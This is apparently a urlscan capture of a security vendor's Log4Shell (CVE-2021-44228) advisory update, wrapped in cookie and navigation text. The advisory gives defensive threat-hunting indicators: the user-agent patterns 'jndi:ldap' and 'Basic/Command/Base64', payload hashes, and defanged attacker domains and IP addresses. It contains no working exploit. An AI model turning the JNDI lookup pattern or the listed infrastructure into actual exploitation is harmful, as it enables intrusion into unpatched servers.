itcsecure.com
Open in
urlscan Pro
104.20.5.196
Public Scan
URL:
https://itcsecure.com/uncategorized/update-log4shell-cve-2021-44228-apache-log4j-vulnerability/
Submission: On July 26 via api from US — Scanned from DE
Submission: On July 26 via api from US — Scanned from DE
Form analysis
2 forms found in the DOMGET https://itcsecure.com
<form class="elementor-search-form" role="search" action="https://itcsecure.com" method="get">
<div class="elementor-search-form__toggle">
<i aria-hidden="true" class="fas fa-search"></i> <span class="elementor-screen-only">Search</span>
</div>
<div class="elementor-search-form__container">
<input placeholder="Search..." class="elementor-search-form__input" type="search" name="s" title="Search" value="">
<div class="dialog-lightbox-close-button dialog-close-button">
<i aria-hidden="true" class="eicon-close"></i> <span class="elementor-screen-only">Close</span>
</div>
</div>
</form>
GET https://itcsecure.com
<form class="elementor-search-form" role="search" action="https://itcsecure.com" method="get">
<div class="elementor-search-form__toggle">
<i aria-hidden="true" class="fas fa-search"></i> <span class="elementor-screen-only">Search</span>
</div>
<div class="elementor-search-form__container">
<input placeholder="Search..." class="elementor-search-form__input" type="search" name="s" title="Search" value="">
<div class="dialog-lightbox-close-button dialog-close-button">
<i aria-hidden="true" class="eicon-close"></i> <span class="elementor-screen-only">Close</span>
</div>
</div>
</form>
Text Content
WE USE COOKIES ON OUR WEBSITE These help us recognise you and your device and store some information about your preferences. We set out more information in our Cookie Policy. [#OOI_PERSONAL_INFORMATION#] Use necessary cookies only Allow all cookies Show details OK Use necessary cookies only Allow selection Allow all cookies Strictly Necessary Functional Performance Targeting Show details Cookie declaration [#IABV2SETTINGS#] About Strictly Necessary (10) Functional (5) Performance (4) Targeting (20) Unclassified (0) These cookies are necessary for the website to function and cannot be switched off in our systems. They are usually only set in response to actions made by you which amount to a request for services, such as setting your privacy preferences, logging in or filling in forms. You can set your browser to block or alert you about these cookies, but some parts of the site will not then work. These cookies do not store any personally identifiable information. NameProviderPurposeExpiryType__cf_bm [x2]Glassdoor VimeoThis cookie is used to distinguish between humans and bots. This is beneficial for the website, in order to make valid reports on the use of their website.1 dayHTTPAWSALBGlassdoorRegisters which server-cluster is serving the visitor. This is used in context with load balancing, in order to optimize user experience. 6 daysHTTPAWSALBCORSGlassdoorRegisters which server-cluster is serving the visitor. This is used in context with load balancing, in order to optimize user experience. 6 daysHTTPJSESSIONIDGlassdoorPreserves users states across page requests.1 dayHTTPSameSiteGlassdoorEnsures visitor browsing-security by preventing cross-site request forgery. This cookie is essential for the security of the website and visitor. 1 dayHTTPCONSENT [x2]Google YouTubeUsed to detect if the visitor has accepted the marketing category in the cookie banner. This cookie is necessary for GDPR-compliance of the website. 2 yearsHTTPCookieConsentCookiebotStores the user's cookie consent state for the current domain1 yearHTTPelementorITC SecureUsed in context with the website's WordPress theme. The cookie allows the website owner to implement or change the website's content in real-time.PersistentHTML These cookies enable the website to provide enhanced functionality and personalisation. They may be set by us or by third party providers whose services we have added to our pages. If you do not allow these cookies then some or all of these services may not function properly. NameProviderPurposeExpiryTypealrGlassdoorUsed to track which users have shown interest in what job postings. The cookie ensures that the most relevant job postings are shown to the specific user. 1 dayHTTPasstGlassdoorUsed to track which users have shown interest in what job postings. The cookie ensures that the most relevant job postings are shown to the specific user. 1 dayHTTPcassGlassdoorUsed to track which users have shown interest in what job postings. The cookie ensures that the most relevant job postings are shown to the specific user. 1 dayHTTPgdsidGlassdoorUsed to track which users have shown interest in what job postings. The cookie ensures that the most relevant job postings are shown to the specific user. 1 dayHTTPGSESSIONIDGlassdoorUsed to track which users have shown interest in what job postings. The cookie ensures that the most relevant job postings are shown to the specific user. 1 dayHTTP These cookies allow us to count visits and traffic sources so we can measure and improve the performance of our site. They help us to know which pages are the most and least popular and see how visitors move around the site. All information these cookies collect is aggregated and therefore anonymous. If you do not allow these cookies we will not know when you have visited our site, and will not be able to monitor its performance. NameProviderPurposeExpiryTypeADRUM_BTaGlassdoorThis cookie is used to detect errors on the website - this information is sent to the website's support staff in order to optimize the visitor's experience on the website.1 dayHTTP_gaGoogleRegisters a unique ID that is used to generate statistical data on how the visitor uses the website.2 yearsHTTP_gatGoogleUsed by Google Analytics to throttle request rate1 dayHTTP_gidGoogleRegisters a unique ID that is used to generate statistical data on how the visitor uses the website.1 dayHTTP These cookies may be set through our site by our advertising partners. They may be used by those companies to build a profile of your interests and show you relevant adverts on other sites. They do not store directly personal information, but are based on uniquely identifying your browser and internet device. If you do not allow these cookies, you will experience less targeted advertising. NameProviderPurposeExpiryTypeIDEGoogleUsed by Google DoubleClick to register and report the website user's actions after viewing or clicking one of the advertiser's ads with the purpose of measuring the efficacy of an ad and to present targeted ads to the user.1 yearHTTPpagead/landing [x2]GoogleCollects data on visitor behaviour from multiple websites, in order to present more relevant advertisement - This also allows the website to limit the number of times that they are shown the same advertisement. SessionPixeltest_cookieGoogleUsed to check if the user's browser supports cookies.1 dayHTTPgdIdGlassdoorUsed to track which users have shown interest in what job postings. The cookie ensures that the most relevant job postings are shown to the specific user. 10 yearsHTTPtrsGlassdoorUsed to track which users have shown interest in what job postings. The cookie ensures that the most relevant job postings are shown to the specific user. 1 yearHTTPpagead/1p-user-list/#GoogleTracks if the user has shown interest in specific products or events across multiple websites and detects how the user navigates between sites. This is used for measurement of advertisement efforts and facilitates payment of referral-fees between websites.SessionPixel_gcl_auGoogleUsed by Google AdSense for experimenting with advertisement efficiency across websites using their services. 3 monthsHTTPVISITOR_INFO1_LIVEYouTubeTries to estimate the users' bandwidth on pages with integrated YouTube videos.179 daysHTTPYSCYouTubeRegisters a unique ID to keep statistics of what videos from YouTube the user has seen.SessionHTTPytidb::LAST_RESULT_ENTRY_KEYYouTubeStores the user's video player preferences using embedded YouTube videoPersistentHTMLyt-remote-cast-availableYouTubeStores the user's video player preferences using embedded YouTube videoSessionHTMLyt-remote-cast-installedYouTubeStores the user's video player preferences using embedded YouTube videoSessionHTMLyt-remote-connected-devicesYouTubeStores the user's video player preferences using embedded YouTube videoPersistentHTMLyt-remote-device-idYouTubeStores the user's video player preferences using embedded YouTube videoPersistentHTMLyt-remote-fast-check-periodYouTubeStores the user's video player preferences using embedded YouTube videoSessionHTMLyt-remote-session-appYouTubeStores the user's video player preferences using embedded YouTube videoSessionHTMLyt-remote-session-nameYouTubeStores the user's video player preferences using embedded YouTube videoSessionHTMLyt.innertube::nextIdYouTubeRegisters a unique ID to keep statistics of what videos from YouTube the user has seen.PersistentHTMLyt.innertube::requestsYouTubeRegisters a unique ID to keep statistics of what videos from YouTube the user has seen.PersistentHTML Unclassified cookies are cookies that we are in the process of classifying, together with the providers of individual cookies. We do not use cookies of this type. [#IABV2_LABEL_PURPOSES#] [#IABV2_LABEL_FEATURES#] [#IABV2_LABEL_PARTNERS#] [#IABV2_BODY_PURPOSES#] [#IABV2_BODY_FEATURES#] [#IABV2_BODY_PARTNERS#] What are cookies? A cookie is a small text file that is downloaded to your browser when you access a website. Cookies are used by many websites and can serve numerous purposes, including remembering your preferences and other browsing session information, or providing analytic data for the website creators. How we use cookies We use cookies for the purpose of analytics, necessary site functionality and performance. We’re keen to understand how both potential and existing customers interact with our services and marketing material, and we use that information to improve what we offer. We do not serve third-party ads on our site, nor do we provide any information about your browsing to marketing third parties. For more information on how we use your data, please refer to our Privacy Notice. Consent to use cookies We will ask for your permission (consent) to place cookies or other similar technologies on your device, except where these are essential for us to provide you with a service that you have requested or are necessary for the website to operate. Cookie declaration last updated on 25.07.22 by Cookiebot * Solutions * Our Integrated Delivery Model * NAVIGATOR * Assess & Advise * Digital Risk Protection * PULSE: Our Platform * Secure Networking * Vulnerability Intelligence * Behavioural Analytics * Managed Detection and Response (MDR) * Threat Intelligence * Third-Party Risk Management * Cyber Advisory * Assess & Advise * Awareness & Training * Design & Implementation * Security Assurance * Security in Residence * Digital Risk Protection * Incident Response * Zero Trust Identity & Access Management * Resources * News Centre * ITC Blog * Case Studies * Events & Webinars * Workshops * White Papers & Reports * Company * We are ITC Secure * Our People * Our Partners * Our Innovation * Accreditations * Careers * Contact Us Menu * Solutions * Our Integrated Delivery Model * NAVIGATOR * Assess & Advise * Digital Risk Protection * PULSE: Our Platform * Secure Networking * Vulnerability Intelligence * Behavioural Analytics * Managed Detection and Response (MDR) * Threat Intelligence * Third-Party Risk Management * Cyber Advisory * Assess & Advise * Awareness & Training * Design & Implementation * Security Assurance * Security in Residence * Digital Risk Protection * Incident Response * Zero Trust Identity & Access Management * Resources * News Centre * ITC Blog * Case Studies * Events & Webinars * Workshops * White Papers & Reports * Company * We are ITC Secure * Our People * Our Partners * Our Innovation * Accreditations * Careers * Contact Us Search Close Linkedin Twitter Facebook Youtube Contact Us * Solutions * Our Integrated Delivery Model * NAVIGATOR * Assess & Advise * Digital Risk Protection * PULSE: Our Platform * Secure Networking * Vulnerability Intelligence * Behavioural Analytics * Managed Detection and Response (MDR) * Threat Intelligence * Third-Party Risk Management * Cyber Advisory * Assess & Advise * Awareness & Training * Design & Implementation * Security Assurance * Security in Residence * Digital Risk Protection * Incident Response * Zero Trust Identity & Access Management * Resources * News Centre * ITC Blog * Case Studies * Events & Webinars * Workshops * White Papers & Reports * Company * We are ITC Secure * Our People * Our Partners * Our Innovation * Accreditations * Careers * Contact Us Menu * Solutions * Our Integrated Delivery Model * NAVIGATOR * Assess & Advise * Digital Risk Protection * PULSE: Our Platform * Secure Networking * Vulnerability Intelligence * Behavioural Analytics * Managed Detection and Response (MDR) * Threat Intelligence * Third-Party Risk Management * Cyber Advisory * Assess & Advise * Awareness & Training * Design & Implementation * Security Assurance * Security in Residence * Digital Risk Protection * Incident Response * Zero Trust Identity & Access Management * Resources * News Centre * ITC Blog * Case Studies * Events & Webinars * Workshops * White Papers & Reports * Company * We are ITC Secure * Our People * Our Partners * Our Innovation * Accreditations * Careers * Contact Us Search Close Linkedin Twitter Facebook Youtube Contact Us UPDATE: LOG4SHELL –CVE-2021-44228 –APACHE LOG4J VULNERABILITY * December 15, 2021 * 9:12 am * ITC Secure Priority: Critical Executive Summary: ITC Secure is continuing to monitor for any alerts that could indicate an incident related to the recent Log4J vulnerability. ITC have carried out threat hunting across the available log sources we ingest into Sentinel for signs of initial compromise and reviewed endpoint activity for suspicious process executions which would be seen following any initial compromise. ITC will continue to carry out these threat hunting activities and will escalate any findings. We are conscious that we may not have coverage of all log sources within your estate and at the time of preparing this report, have provided further details and information on IOCs that your internal Network and Security Teams can use to assist further investigation. Specific guidance that has been published by Microsoft can be found here. Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation -Microsoft Security Blog Further Guidance at the time of preparing this report: IOCs: While user agent strings are available from different log sources, to detect CVE-2021-44228, IIS server logs should be reviewed for evidence of the below user agents: “jndi:ldap” “Basic/Command/Base64” If the above user agent strings are found within the IIS logs it is not indicative that a compromise has occurred, but it does indicate that someone has attempted to exploit the server. If the server was vulnerable to CVE-2021-44228 it may have succeeded. Please reach out to the ITC SOC should you find any reference to these user agent strings with the targeted server so that we can provide further investigation. Hashes: These hashes have been identified as being involved in the recent Log4j attacks. If you have the means to search for hashes through anti-virus or similar, consider searching for evidence of these hashes within your environment. If found, contact ITC SOC for further investigation. If you can block the hashes, consider doing so but understand that attackers will be regularly changing their payloads to avoid detection through these IOCs. 8933820cf2769f6e7f1a711e188f551c3d5d3843c52167a34ab8d6eabb0a63ef 6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a 3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26 776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00 8052f5cc4dfa9a8b4f67280a746acbc099319b9391e3b495a27d08fb5f08db81 2b794cc70cb33c9b3ae7384157ecb78b54aaddc72f4f9cf90b4a4ce4e6cf8984 0e574fd30e806fe4298b3cbccb8d1089454f42f52892f87554325cb352646049 19370ef36f43904a57a667839727c09c50d5e94df43b9cfb3183ba766c4eae3d 2a4e636c4077b493868ea696db3be864126d1066cdc95131f522a4c9f5fb3fec 2b794cc70cb33c9b3ae7384157ecb78b54aaddc72f4f9cf90b4a4ce4e6cf8984 39db1c54c3cc6ae73a09dd0a9e727873c84217e8f3f00e357785fba710f98129 5c46098887e488d91f42c6d9b93b17b2736c9f4cb5a4a1e476c87c0d310a3f28 6370939d4ff51b934b7a2674ee7307ed06111ab3b896a8847d16107558f58e5b 63d43e5b292b806e857470e53412310ad7103432ba3390ecd4f74e432530a8a9 6a8965a0f897539cc06fefe65d1a4c5fa450d002d1a9d5d69d2b48f697ee5c05 715f1f821d028e165bfa750d73505f1a6136184999411300cc88c18ebfa6e8f7 776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00 8052f5cc4dfa9a8b4f67280a746acbc099319b9391e3b495a27d08fb5f08db81 a3f72a73e146834b43dab8833e0a9cfee6d08843a4c23fdf425295e53517afce b3a6fe5bc3883fd26c682bb6271a700b8a6fe006ad8df6c09cc87530fcd3a778 b55ddbaee7abf1c73570d6543dd108df0580b08f730de299579570c23b3078c0 c154d739cab62e958944bb4ac5ebad6e965a0442a3f1c1d99d56137e3efa8e40 c38f0f809a1d8c50aafc2f13185df1441345f83f6eb4ef9c48270b9bd90c6799 e20806791aeae93ec120e728f892a8850f624ce2052205ddb3f104bbbfae7f80 fe98548300025a46de1e06b94252af601a215b985dad31353596af3c1813efb0 Domains: ITC has carried out and will continue to carry out threat hunting using the below domains which have been identified as being involved with CVE-2021-44228. Due to the nature of this attack, domains that host malicious payloads will change frequently to avoid detection or due to takedowns. x41[.]me m3[.]wtf cuminside[.]club abrahackbugs[.]xyz pwn[.]af rce[.]ee psc4fuel[.]com rs3c1[.]com leakix[.]net IPs: ITC has carried out and will continue to threat hunt using the below IP addresses against firewall logs where available. 109.237.96[.]124 185.100.87[.]202 213.164.204[.]146 185.220.101[.]146 171.25.193[.]20 178.17.171[.]102 45.155.205[.]233 171.25.193[.]25 171.25.193[.]77 171.25.193[.]78 185.220.100[.]242 IPs Continued: 185.220.101[.]39 18.27.197[.]252 89.234.182[.]139 104.244.79[.]6 164.52.212[.]196 193.196.53[.]232 121.5.113[.]11 178.176.202[.]121 178.176.203[.]190 197.246.171[.]83 42.192.11[.]41 45.130.229[.]168 18.228.7[.]109 45.33.47[.]240 80.78.254[.]57 176.32.33[.]14 137.184.61[.]190 45.33.47[.]240 80.78.254[.]57 205.185.115[.]217 176.32.33[.]14 104.244.74[.]57 104.244.76[.]170 107.189.12[.]135 116.24.67[.]213 134.122.34[.]28 137.184.102[.]82 122.161.50[.]23 137.184.106[.]119 142.93.34[.]250 143.198.32[.]72 143.198.45[.]117 147.182.167[.]165 147.182.169[.]254 147.182.219[.]9 151.115.60[.]113 159.65.155[.]208 159.65.58[.]66 164.90.199[.]216 167.99.164[.]201 167.99.172[.]213 167.99.172[.]58 178.62.79[.]49 181.214.39[.]2 185.220.101[.]134 185.220.101[.]138 185.220.101[.]141 185.220.101[.]143 185.220.101[.]144 185.220.101[.]145 185.220.101[.]147 185.220.101[.]149 185.220.101[.]154 IPs Continued: 185.220.101[.]156 185.220.101[.]157 185.220.101[.]158 185.220.101[.]160 185.220.101[.]161 185.220.101[.]163 185.220.101[.]171 185.220.101[.]172 185.220.101[.]175 185.220.101[.]177 185.220.101[.]180 185.220.101[.]181 185.220.101[.]182 185.220.101[.]185 185.220.101[.]186 185.220.101[.]189 185.220.101[.]191 193.189.100[.]203 194.48.199[.]78 195.19.192[.]26 195.254.135[.]76 195.54.160[.]149 23.129.64[.]131 185.38.175[.]132 188.166.122[.]43 188.166.48[.]55 188.166.92[.]228 23.129.64[.]146 23.129.64[.]148 45.153.160[.]131 46.182.21[.]248 54.173.99[.]121 62.102.148[.]69 62.76.41[.]46 68.183.198[.]247 68.183.44[.]143 72.223.168[.]73 81.17.18[.]60 92.63.197[.]53 164.52.53[.]163 164.52.53[.]163 185.220.100[.]240 198.98.60[.]19 86.109.208[.]194 41.203.140[.]114 49.7.224[.]217 195.251.41[.]139 189.188.33[.]125 PrevPreviousLog4Shell –CVE-2021-44228 –Apache Log4j Vulnerability NextUPDATE: Log4Shell –CVE-2021-44228 –Apache Log4j Vulnerability (15.12.21)Next RELATED POSTS News HAVEN CYBER TECHNOLOGIES AND CASSAVA TECHNOLOGIES LAUNCH A MATRIX OF CYBER SECURITY FUSION CENTRES ACROSS SIX COUNTRIES IN AFRICA Read More » People, technology and governance PEOPLE @ ITC: Q&A WITH ALAN ARMSTRONG, ITC SENIOR CLOUD SECURITY & IDENTITY CONSULTANT Read More » Building competitive advantage BALANCING COMPLEXITY AND SIMPLICITY IN CYBER SECURITY Read More » Threat Horizon SONICWALL ADVISORY: PATCHES FOR SSLVPN SMA1000 DEVICES Read More » FIND OUT HOW WE CAN MAKE YOUR DIGITAL WORLD A SAFER PLACE TO DO BUSINESS. Talk to us © ITC Secure. All rights reserved. * Articles * Privacy Policy * Recruitment Privacy Notice * Modern Slavery Statement * Cookie Policy Please share your location to continue. Check our help guide for more info.